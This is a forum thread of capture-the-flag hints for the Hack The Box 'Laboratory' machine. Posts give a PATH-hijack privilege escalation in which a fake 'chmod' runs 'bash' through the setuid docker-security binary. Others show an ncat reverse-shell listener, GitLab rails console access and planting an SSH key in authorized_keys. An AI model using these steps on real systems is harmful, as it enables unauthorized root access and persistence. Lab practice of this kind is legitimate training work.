TUTORIAL Laboratory
by southerndarkness - November 14, 2020 at 11:51 PM
#37
(November 16, 2020 at 11:29 AM)iecoo7Ei Wrote:
(November 16, 2020 at 10:24 AM)ARhOmOuTEd Wrote:
(November 16, 2020 at 08:34 AM)Detro1t Wrote: Can you explain how did you do it/find it? I'm really stuck to understand the meaning of the bin, i did ltrace and all but i still can't figure out how to privesc from here.

Nvm I did it, i rooted it. I may be blind.
How did you do it? Can you please explain?

There is setuid binary /usr/local/bin/docker-security.  This chmod's the docker socket, but doesn't declare a full path for the chmod command.  We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But i'm still stuck in docker. how did you break out of docker?
#38
(November 16, 2020 at 12:01 PM)ARhOmOuTEd Wrote:
(November 16, 2020 at 11:29 AM)iecoo7Ei Wrote:
(November 16, 2020 at 10:24 AM)ARhOmOuTEd Wrote:
(November 16, 2020 at 08:34 AM)Detro1t Wrote: Can you explain how did you do it/find it? I'm really stuck to understand the meaning of the bin, i did ltrace and all but i still can't figure out how to privesc from here.

Nvm I did it, i rooted it. I may be blind.
How did you do it? Can you please explain?

There is setuid binary /usr/local/bin/docker-security.  This chmod's the docker socket, but doesn't declare a full path for the chmod command.  We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But i'm still stuck in docker. how did you break out of docker?

You don't need to break out of docker.  Can you become admin on gitlab?
#39
Ehi I have rails console block in Switch to inspect mode ... it happened to you??

[email protected]:/tmp$ gitlab-rails console
gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
Switch to inspect mode.

ok solved..

[email protected]:~/gitlab-rails/working$ gitlab-rails console
gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0>
#40
(November 16, 2020 at 12:55 PM)iecoo7Ei Wrote:
(November 16, 2020 at 12:01 PM)ARhOmOuTEd Wrote:
(November 16, 2020 at 11:29 AM)iecoo7Ei Wrote:
(November 16, 2020 at 10:24 AM)ARhOmOuTEd Wrote:
(November 16, 2020 at 08:34 AM)Detro1t Wrote: Can you explain how did you do it/find it? I'm really stuck to understand the meaning of the bin, i did ltrace and all but i still can't figure out how to privesc from here.

Nvm I did it, i rooted it. I may be blind.
How did you do it? Can you please explain?

There is setuid binary /usr/local/bin/docker-security.  This chmod's the docker socket, but doesn't declare a full path for the chmod command.  We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But i'm still stuck in docker. how did you break out of docker?

You don't need to break out of docker.  Can you become admin on gitlab?

Thanks, you helped me out, i got root know! :-)
#41
Nicely done gentleman ...

I don't know how some of these boxes are 20 pointers !
#42
can any one post walkthrough until user flag?
#43
(November 18, 2020 at 11:03 PM)exord26 Wrote: can any one post  walkthrough until user flag?
Everything’s in this thread to get to the shell, when in the shell Google change password gitlab docker. Follow the instructions and login as dexter.
#44
(November 19, 2020 at 07:43 AM)JustMeAndYou Wrote:
(November 18, 2020 at 11:03 PM)exord26 Wrote: can any one post  walkthrough until user flag?
Everything’s in this thread to get to the shell, when in the shell Google change password gitlab docker. Follow the instructions and login as dexter.


i change but now ?
how continue ?
#45
Can anyone explain this box clearly to get root :)
#46
(November 22, 2020 at 04:08 PM)Shut Wrote: Can anyone explain this box clearly to get root :)

Laboratory writeup is available
https://0xdedinfosec.github.io
Hash ->
AMvgOmRCNzBloX3T$rd5nRPwkBPHenf6VLHfsXb066LNq0MZBRYeEsuCZviD8nQGvVLMaW9iH1hb5FPHzdl.McOJ8GrFIFfdSnIo4t1
If you like the writeup pls leave a comment 😇
#47
(November 22, 2020 at 04:09 PM)0xvijay Wrote:
(November 22, 2020 at 04:08 PM)Shut Wrote: Can anyone explain this box clearly to get root :)

Laboratory writeup is available
https://0xdedinfosec.github.io
Hash ->
AMvgOmRCNzBloX3T$rd5nRPwkBPHenf6VLHfsXb066LNq0MZBRYeEsuCZviD8nQGvVLMaW9iH1hb5FPHzdl.McOJ8GrFIFfdSnIo4t1
If you like the writeup pls leave a comment 😇
thanks for writeup :)
#48
[quote="Kali76" pid='3074893' dateline='1605522510']

>>ok I hve a shell but where is user flag?
>>[email protected]:~# rlwrap nc -nlvp 5555
>>Ncat: Version 7.80 ( https://nmap.org/ncat )
>>Ncat: Listening on :::5555
>>Ncat: Listening on 0.0.0.0:5555
>>Ncat: Connection from 10.10.10.216.
>>Ncat: Connection from 10.10.10.216:42898.

Can you tell what the erb payload you've used?      (erb = ERB.new("<%=' ?????????????????' %>")
I've successfully put key in /var/opt/gitlab/.ssh/authorized_keys and even check that my key is there, but I can't connect with ssh
Now I want to try reverse shell, but can't find proper payload

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Laboratory orangutang 0 606 December 17, 2020 at 11:12 PM
Last Post: orangutang
TUTORIAL Laboratory.htb id_rsa for root and the root key ARhOmOuTEd 9 4,098 December 13, 2020 at 12:45 PM
Last Post: Allure_5
TUTORIAL Laboratory detailed writeup Jockerjock 4 1,798 November 26, 2020 at 10:05 AM
Last Post: Jockerjock

 Users browsing this thread: 1 Guest(s)